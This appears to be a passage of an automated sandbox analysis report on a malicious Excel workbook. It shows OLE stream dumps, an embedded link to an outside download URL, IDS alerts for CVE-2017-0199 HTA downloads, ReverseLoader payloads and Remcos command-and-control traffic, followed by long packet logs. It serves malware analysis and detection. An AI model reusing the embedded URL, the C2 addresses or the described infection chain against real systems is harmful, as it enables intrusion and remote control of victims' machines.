                                                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:200
                                                                                                                                                                                                                  Entropy:3.3020681057018666
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . y C * . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:MBD014C1E4C/\x1CompObj
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:99
                                                                                                                                                                                                                  Entropy:3.631242196770981
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:MBD014C1E4C/Package
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                  Stream Size:21079
                                                                                                                                                                                                                  Entropy:7.699462855468023
                                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                                  Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:MBD014C1E4D/\x1CompObj
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:99
                                                                                                                                                                                                                  Entropy:3.631242196770981
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:MBD014C1E4D/Package
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                                                  Stream Size:119897
                                                                                                                                                                                                                  Entropy:7.948071709773328
                                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                                  Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b5 0a 9b e0 d8 01 00 00 e0 08 00 00 13 00 d0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:MBD014C1E4E/\x1Ole
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:840
                                                                                                                                                                                                                  Entropy:5.785462375518992
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . [ * . 5 Q . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . a . c . e . s . s . o . . . r . u . n . / . K . J . A . P . m . B . ? . & . i . n . t . e . r . n . e . t . = . c . o . o . p . e . r . a . t . i . v . e . & . c . r . e . w . = . s . a . l . t . y . & . c . o . r . r . a . l . = . m . o . m . e . n . t . o . u . s . & . e . y . e . s . t . r . a . i . n . . . . w . E . { 1 C * | / " . 3 < A j D l . ? / a . | M . . C { q . o . 3 ~ . z . Z ! # 5 . ' 9 ) I ) . 2
                                                                                                                                                                                                                  Data Raw:01 00 00 02 5b db db 2a 14 35 bc 51 00 00 00 00 00 00 00 00 00 00 00 00 be 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b ba 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 63 00 65 00 73 00 73 00 6f 00 2e 00 72 00 75 00 6e 00 2f 00 4b 00 4a 00 41 00 50 00 6d 00 42 00 3f 00 26 00 69 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 3d 00 63 00 6f 00 6f 00 70 00
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:Workbook
                                                                                                                                                                                                                  CLSID:
                                                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                  Stream Size:510495
                                                                                                                                                                                                                  Entropy:7.999298999445815
                                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z z . ~ [ j . . . . 2 . \\ a / . a ~ . . R . . . . . . . . . . . k . . . \\ . p . . < H ? } . W z . e . V " . K . D . . ; . . I 9 N 0 } V . . . . V J ? 8 . L o } Z M . c & Z x . 1 . a . H F 4 M s . ^ . f . ] > . . B . . . 9 a . . . . . . . = . . . A , . . . ; . . . . . N ' . . . . z . . . . " . . . . " . . . * U = . . . d . . , P V I u @ . . . . . . . C " . . . . . . . . . . . . . . . U 1 . . . . ( . 8 . K 8 p W . g $ r 1 . . . . u . . . 5 M b . ; U c . ,
                                                                                                                                                                                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 8c 5a 7a 09 e6 9d 7e 5b 80 84 cc 6a 06 c8 8d e5 b7 06 aa e1 0e 9e 32 95 96 ea 04 5c 61 2f 03 8d 93 e7 61 7e db 0e 07 52 a8 0e 8a e8 10 0f bd 19 e1 00 02 00 b0 04 c1 00 02 00 8a 6b e2 00 00 00 5c 00 70 00 bd 1b 3c fe 48 ac 3f 7d 1c 57 ec 7a d6 e5 89 1d 65 2e 8a 56 a7 c0 22 0d 4b 11 94 44 07 04
                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                  2024-10-31T05:13:54.323181+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1107.174.146.4680192.168.2.2249174TCP
                                                                                                                                                                                                                  2024-10-31T05:13:55.976399+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249162107.174.146.4680TCP
                                                                                                                                                                                                                  2024-10-31T05:13:55.976418+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1107.174.146.4680192.168.2.2249162TCP
                                                                                                                                                                                                                  2024-10-31T05:13:58.941100+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164107.174.146.4680TCP
                                                                                                                                                                                                                  2024-10-31T05:13:58.941160+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1107.174.146.4680192.168.2.2249164TCP
                                                                                                                                                                                                                  2024-10-31T05:14:05.455027+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249165107.174.146.4680TCP
                                                                                                                                                                                                                  2024-10-31T05:14:17.359812+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.250.185.65443192.168.2.2249167TCP
                                                                                                                                                                                                                  2024-10-31T05:14:19.844813+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249172107.174.146.4680TCP
                                                                                                                                                                                                                  2024-10-31T05:14:33.663885+01002020423ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound1107.174.146.4680192.168.2.2249174TCP
                                                                                                                                                                                                                  2024-10-31T05:14:33.663885+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21107.174.146.4680192.168.2.2249174TCP
                                                                                                                                                                                                                  2024-10-31T05:14:35.991411+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249176107.175.130.2014645TCP
                                                                                                                                                                                                                  2024-10-31T05:14:37.177677+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249177178.237.33.5080TCP
                                                                                                                                                                                                                  2024-10-31T05:14:37.257678+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249178107.175.130.2014645TCP
                                                                                                                                                                                                                  2024-10-31T05:14:38.656033+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21172.217.16.193443192.168.2.2249175TCP
                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.342783928 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.342884064 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.342981100 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.348931074 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.348948956 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.964447975 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.964566946 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.969027996 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.969038963 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.969283104 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:54.969331980 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.027857065 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.075325012 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.284308910 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.284363985 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.284403086 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.284432888 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.285587072 CET49161443192.168.2.22172.67.162.95
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.285598040 CET44349161172.67.162.95192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.302012920 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.306956053 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.307012081 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.307064056 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.311911106 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976300001 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976330996 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976352930 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976371050 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976386070 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976402044 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976398945 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976418018 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976437092 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976437092 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976437092 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976448059 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976492882 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976509094 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976524115 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976532936 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976540089 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.976562023 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.981322050 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.981370926 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.981384039 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.981388092 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.981436014 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:55.982755899 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093430042 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093451023 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093467951 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093492031 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093496084 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093497038 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093509912 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093527079 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093529940 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093549967 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093555927 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.093986034 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094029903 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094052076 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094074011 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094090939 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094108105 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094120979 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094144106 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094161034 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094178915 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094748020 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094780922 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094786882 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094799042 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094819069 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094829082 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094873905 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094890118 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094906092 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094912052 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094922066 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.094940901 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095732927 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095750093 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095763922 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095782995 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095793009 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095877886 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095894098 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095909119 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095915079 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095926046 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.095944881 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.098403931 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.098453999 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.098464012 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.098503113 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.098510027 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.098548889 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210561037 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210592985 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210608959 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210621119 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210633993 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210659027 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210673094 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210689068 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210705042 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210716963 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210731030 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210755110 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210777998 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210793972 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210820913 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210839033 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210905075 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210921049 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210936069 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210949898 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210952044 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210966110 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.210984945 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211076975 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211091995 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211106062 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211121082 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211121082 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211138964 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211142063 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211158037 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211174011 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211621046 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211636066 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211652994 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211662054 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211678982 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211702108 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211747885 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211764097 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211780071 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211788893 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211796999 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211800098 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211826086 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211833954 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211867094 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211909056 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211946011 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211961031 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211976051 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.211994886 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212030888 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212335110 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212378025 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212390900 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212407112 CET8049162107.174.146.46192.168.2.22
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212433100 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212443113 CET4916280192.168.2.22107.174.146.46
                                                                                                                                                                                                                  Oct 31, 2024 05:13:56.212491035 CET8049162107.174.146.46192.168.2.22
